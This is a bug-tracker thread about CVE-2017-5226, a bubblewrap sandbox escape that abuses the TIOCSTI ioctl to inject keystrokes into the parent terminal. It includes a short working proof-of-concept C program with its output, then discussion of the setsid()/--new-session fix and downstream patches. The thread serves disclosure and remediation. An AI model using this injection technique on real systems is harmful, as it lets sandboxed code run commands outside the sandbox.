CVE-2017-5226 -- bubblewrap escape via TIOCSTI ioctl #142

Closed
smcv opened this issue Jan 9, 2017 · 5 comments

Comments


smcv commented Jan 9, 2017

On Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702, Federico Bento <up201407890@alunos.dcc.fc.up.pt> writes:

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.

smcv added a commit to smcv/bubblewrap that referenced this issue Jan 9, 2017
This prevents the sandboxed code from getting a controlling tty,
which in turn prevents it from accessing the TIOCSTI ioctl and hence
faking terminal input.

Fixes: containers#142

smcv commented Jan 9, 2017

Calling setsid() appears to be sufficient to avoid this, if we are willing to sacrifice tty job control for the sandboxed processes. With a slightly modified exploit that calls perror() if the ioctl fails:

ioctl TIOCSTI: Operation not permitted
ioctl TIOCSTI: Operation not permitted
ioctl TIOCSTI: Operation not permitted

I'm going to apply that in Debian for now.
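An added example, not code from the issue or from bubblewrap itself, that checks the property smcv relies on: a child that calls setsid() becomes a session leader with no controlling terminal, so opening /dev/tty (which always names the controlling terminal) fails with ENXIO, and TIOCSTI on the inherited PTY is no longer allowed. The function names are my own.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if the calling process has a controlling terminal, 0 otherwise.
 * /dev/tty is an alias for the controlling terminal; when the session has
 * none, open() fails with ENXIO. O_NOCTTY keeps this probe from acquiring
 * one as a side effect. */
int has_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* Forks a child that detaches with setsid(), as the Debian fix does before
 * exec'ing the sandboxed program, and reports whether the child still has a
 * controlling terminal. Returns the child's answer (0 expected) or -1 on
 * error. The fresh child is never a process-group leader, so setsid() is
 * allowed to succeed. */
int child_has_tty_after_setsid(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() < 0)
            _exit(2);                      /* constructed error code */
        _exit(has_controlling_tty());
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    if (WEXITSTATUS(status) == 2)
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    printf("parent has controlling tty: %d\n", has_controlling_tty());
    printf("child after setsid() has controlling tty: %d\n",
           child_has_tty_after_setsid());
    return 0;
}
```

Run from an interactive shell the first line prints 1 and the second 0; run without a TTY (cron, systemd) both print 0, which is the case pxeger asks about further down.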


smcv commented Jan 9, 2017

This is arguably not a vulnerability in Bubblewrap itself, because it does not give the user calling Bubblewrap any more privileges outside the sandbox than they had inside.

However, I think it is correct to treat it as a vulnerability in Flatpak, and in any other sandboxes based on Bubblewrap that might be invoked with a controlling terminal.


smcv commented Jan 9, 2017

I should note here for completeness that at least one member of the Debian security team seems to think this and its clones (CVE-2005-4890, CVE-2016-7545, CVE-2016-2781, CVE-2016-2779, CVE-2016-2568) are really all examples of one kernel issue, namely "TIOCSTI should be a privileged operation". https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702#27

@wland32 wland32 mentioned this issue Mar 25, 2019
ebkalderon added a commit to ebkalderon/bastille that referenced this issue Nov 25, 2019
Note that we do not call `setsid()` just yet because it messes with job
control in some applications, so we leave it disabled for now. Ideally,
we would use an alternative approach, likely with `seccomp`, to achieve
this. For more details, see:

* Discussion: containers/bubblewrap#142
* Flatpak's solution: flatpak/flatpak@902fb71

pxeger commented Mar 15, 2021

Am I right that this is not an issue when bwrap is not attached to a TTY (e.g. run in a script as a systemd service)?


smcv commented Mar 16, 2021

Am I right that this is not an issue when bwrap is not attached to a TTY (e.g. run in a script as a systemd service)?

I think that's correct. However, you don't need to trust me on this - you can try the sample exploit in your environment, and find out.

kaniini added a commit to chainguard-dev/melange that referenced this issue Mar 14, 2023
…5226

Without it, it is possible to escape the sandbox via TIOCSTI ioctls on the session
PTY.

Related: containers/bubblewrap#555
Related: containers/bubblewrap#142
Related: https://news.ycombinator.com/item?id=30825088
Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
algitbot pushed a commit to alpinelinux/abuild that referenced this issue Mar 16, 2023
…-5226)

Bubblewrap has an under-documented option which helps to protect against abuse
of TIOCSTI ioctls against the session PTY to escape the build sandbox, the
--new-session option.

Related: containers/bubblewrap#555
Related: containers/bubblewrap#142
Related: https://news.ycombinator.com/item?id=30825088
Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>